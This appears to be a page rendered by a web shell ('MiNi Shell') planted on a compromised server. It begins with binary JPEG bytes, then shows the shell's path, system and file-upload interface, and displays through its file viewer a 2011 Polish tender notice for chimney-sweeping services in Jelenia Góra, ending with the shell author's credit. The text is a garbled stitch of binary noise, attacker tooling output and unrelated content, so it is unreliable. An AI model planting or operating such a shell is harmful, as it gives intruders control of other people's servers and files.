JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110111/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110111/11809-N-2011.html

<p class="kh_header"><b>Jelenia Góra: Świadczenie usług kominiarskich w budynkach administrowanych przez  ZGL POŁUDNIE w  Jeleniej Górze</b><br>
<b>Numer ogłoszenia: 11809 - 2011; data zamieszczenia: 11.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Lokalowej "Południe" w Jeleniej Górze , Plac Piastowski 2A, 58-560 Jelenia Góra, woj. dolnośląskie, tel. 075 6428200, faks 075 6428201.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zgl.jga.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług kominiarskich w budynkach administrowanych przez  ZGL POŁUDNIE w  Jeleniej Górze.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi kominiarskie świadczone w budynkach komunalnych oraz 
      Wspólnot Mieszkaniowych administrowanych przez Zakład Gospodarki Lokalowej  Południe  w
      Jeleniej Górze, wykonywanych zgodnie z:
-	ustawą z dnia 7 lipca 1994r. Prawo Budowlane (Dz. U. z 2006 r. Nr 156, poz. 1118 z późniejszymi zmianami), 
-	Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 16 czerwca 2003 r. w sprawie ochrony przeciwpożarowej budynków, innych obiektów budowlanych i terenów (Dz. U. Nr 121 poz.1138),
-	Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 16 sierpnia 1999 r. w sprawie warunków technicznych użytkowania budynków mieszkalnych (Dz. U. Nr 74 poz.836),
-	Rozporządzeniem Ministra Infrastruktury z dnia 12.04.2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. Nr 75 poz.690 z późniejszymi zmianami), 

 polegających na:

1.	Czyszczeniu przewodów kominowych             
              - wentylacyjnych - jeden raz w roku,
              - spalinowych - dwa razy w roku;
              - dymowych - cztery razy w roku (przed, po i w trakcie trwania sezonu grzewczego).
            Przez czyszczenie przewodu kominowego należy rozumieć:
	-  czyszczenie przewodu na całej jego długości wraz z głowicą,
-  usunięcie sadzy i innych nieczystości  z czyszczonych przewodów.

2.	Okresowej kontroli przewodów kominowych 
-jeden  raz w roku.
Kontrola przewodów kominowych tj. sprawdzanie stanu technicznego obejmować będzie:
a) Badanie drożności przewodów kominowych wraz z przykanalikami;
b) Badanie prawidłowości podłączeń:
- ilość i rodzaj podłączeń (kratek wentylacyjnych, palenisk gazowych lub węglowych) 
   podłączonych do jednego przewodu kominowego;
- stan techniczny drzwiczek rewizyjnych;
- prawidłowość zainstalowania kratek wentylacyjnych (wielkość ich powierzchni chłonnej);
- czy jest zapewniony dostęp powietrza zewnętrznego koniecznego do prawidłowej cyrkulacji 
   powietrza w lokalu;
- czy w lokalu istnieją urządzenia niezgodne z przepisami wymuszające ciąg kominowy w
   przypadku, gdy istnieją paleniska obsługiwane ciągiem grawitacyjnym lub gdy urządzenia 
   te funkcjonują w przewodach wentylacji zbiorowej.
c) Badanie prawidłowości ciągu kominowego;
d) Badanie stanu technicznego kominów ponad dachem w tym:
   - głowic kominowych;
   - ścian kominowych ponad dachem i na strychu;
   - nasad kominowych;
   - prawidłowości wylotów przewodów;
 e) Badanie prawidłowości dostępu do przeprowadzania kontroli przewodów kominowych w
      tym stanu technicznego:
      - włazów, drabin, itp.;
      - ław kominowych;
 f) Badanie szczelności przewodów kominowych;
 g) Ocenę innych niesprawności mogących wpływać na zagrożenie bezpieczeństwa mieszkańców;
 h) Badanie czy nie dokonano samowolnych zmian w przyłączeniach kominowych;
 i)  Badanie strychów pod kątem łatwopalnych materiałów oraz innych niezbędnych czynności 
     przewidzianych w ramach art.62 ust.1 pkt 1 c Prawa Budowlanego
 j) Badanie tlenku węgla w pomieszczeniach;
k) Wydanie opinii z zakresu gazo-dynamiki budynków administrowanych przez ZGL;
l)  innych czynnościach z wiązanych z kontrolą.
    
Kontrola powinna być przeprowadzona w sposób zapewniający uzyskanie wszelkich informacji służących do prawidłowego określenia sprawności przewodów kominowych oraz zapewnić możliwość bezpiecznego korzystania z urządzeń. 
Kontroli podlegają przewody kominowe: dymowe, spalinowe i wentylacyjne.
           Wykonawca wystawia protokół z corocznego przeglądu stanu technicznego przewodów 
            kominowych: wentylacyjnych, spalinowych i dymowych oraz ich połączeń. 
Zobowiązuje się Wykonawcę do przeglądów we wszystkich lokalach mieszkalnych i użytkowych. W przypadku braku możliwości dostania się do mieszkania, należy przekazać do Technika rejonu informacje celem uzgodnienia terminu ponownej kontroli przewodów kominowych w lokalach. Wobec powyższego opinie nie mogą zawierać stwierdzenia - lokal zamknięty lub tym podobne.

3.	Innych usługach z zakresu kominiarstwa: 
a)	przeprowadzanie inwentaryzacji w budynkach  /obiektach/ przewodów kominowych  o przekroju do 196 cm2  - 1 mb.
b)	przeprowadzanie inwentaryzacji w budynkach  /obiektach/ przewodów kominowych o przekroju pow.196 cm2 - 1mb.
c)	przeprowadzanie inwentaryzacji urządzeń grzewczo-kominowych w budynkach /obiektach podłączenia dymowe, spalinowe, wentylacyjne  - 1 podł.
d)	wyszukiwanie miejsc przerwy lub nieszczelności /badanie całego przewodu/ - 1 przewód
e)	badanie stanu technicznego przewodu kominowego przy użyciu kamery do 10 przewodów  - za  1 mb.
f)	badanie stanu technicznego przewodu kominowego przy użyciu kamery powyżej 10 przewodów -  za 1 mb.
g)	sprawdzenie ciągu kominowego przewodu dymowego, spalinowego lub wentylacyjnego - do 10 przewodów
h)	sprawdzenie ciągu kominowego przewodu dymowego, spalinowego lub wentylacyjnego - za każdy następny przewód
i)	wydanie pisemnej opinii do wszelkiego rodzaju podłączeń dymowych, spalinowych i wentylacyjnych - 1 mieszkanie
j)	sprawdzenie prawidłowości podłączeń  w oparciu o wydaną opinię /wpis do opinii dla każdego  mieszkania/
Wydane opinie powinny wskazywać przewody, ich lokalizację, długość, podłączenia urządzeń , przyczyny wadliwego działania urządzeń grzewczo-kominowych, rozwiązania techniczne, prawidłowego eksploatowania i sposobu usunięcia występujących usterek i wad itp.
      
      4. Wymagania szczegółowe:
         a)  kontrola przewodów kominowych musi być wykonana w 100% lokali w wytypowanych 
              budynkach.
         b) Wykonawca zobowiązany jest do odbioru przewodów kominowych oraz wydawania opinii 
   kominiarskich po wykonanych remontach i porządkowaniu podłączeń.
          c) Wykonawca niezwłocznie powiadomi na piśmie właściwy dział techniczny dla danego 
               ROM-u o zaistniałej awarii, zauważonych usterkach,  zagrożeniach.
          d) Wykonawca udrożni przewód kominowy bez rozkucia przewodu (przy użyciu narzędzi
    kominiarskich) - wykonanie zostanie ujęte w cenie ryczałtowej za czyszczenie kominów.
          e) Wykonawca udzieli co najmniej 3 miesięcznego okresu gwarancji na czyszczenie
               przewodów kominowych oraz  12 miesięcznego okresu gwarancji na inne usługi kominiarskie
               a co za tym idzie wszelkie nieprawidłowości z winy wykonawcy w prawidłowym 
               funkcjonowaniu przewodów w tym okresie Wykonawca usunie w ramach gwarancji 
               nieodpłatnie.
           f) Wykonawca zapewnieni:
- całodobową dyspozycyjność przez okres trwania umowy,
- kontakt za pomocą telefonu 24 godziny/dobę w celu zgłaszania awarii w obsługiwanym 
  ROM-ie.
- natychmiastową interwencję w przypadkach awaryjnych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje    udzielanie zamówień uzupełniających, o których mowa w art. 67 ust. l pkt 6 Ustawy PZP</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.91.50.00-4, 71.35.61.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest wnieść wadium w wysokości 2.000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca spełniał warunki dotyczące posiadania wiedzy i doświadczenia w realizacji zamówień i wykaże  wykonanie co najmniej 1 usługi świadczonej przez okres min.12 m-cy, polegającej na 
wykonywaniu usługi kontroli lub udrażniania przewodów  kominowych w co najmniej 50 budynkach mieszkalnych wielorodzinnych o wartości nie mniejszej niż 10.000,00 zł w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  z podaniem ich wartości oraz daty i miejsca wykonania wraz z dokumentami potwierdzającymi, że usługi te zostały wykonane należycie.
Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca spełniał warunki dotyczące dysponowania: osobami, które będą uczestniczyć w wykonywaniu zamówienia,  tj. min.: 1 osobą  posiadającą  kwalifikacje mistrza w rzemiośle kominiarskim.
Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca spełniał warunki dotyczące ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności  gospodarczej związanej z przedmiotem zamówienia na kwotę minimum 100.000,00 zł.  W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek, o których mowa musi spełnić każdy z wykonawców.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza wprowadzenie zmian postanowień zawartej umowy w stosunku do treści
oferty, na podstawie której dokonano wyboru Wykonawcy w następujących przypadkach:
a)	zmiany przepisów Ustawy o podatku od towarów i usług w zakresie wysokości stawki VAT</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zgl.jga.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Gospodarki Lokalowej Południe Sekcja Zamówień Publicznych ul. Wolności 41, 58-500 Jelenia Góra.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.01.2011 godzina 09:00, miejsce: Zakład Gospodarki Lokalowej Południe Sekcja Zamówień Publicznych ul. Wolności 41, 58-500 Jelenia Góra.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ROM-1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Budynki Komunalne ROM-1    140 szt
Budynki Wspólnot Mieszkaniowych ROM-1    99 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.50.00-4, 71.35.61.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ROM-2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Budynki Komunalne ROM-2  149 szt
Budynki Wspólnot Mieszkaniowych ROM-2  207 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.50.00-4, 71.35.61.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com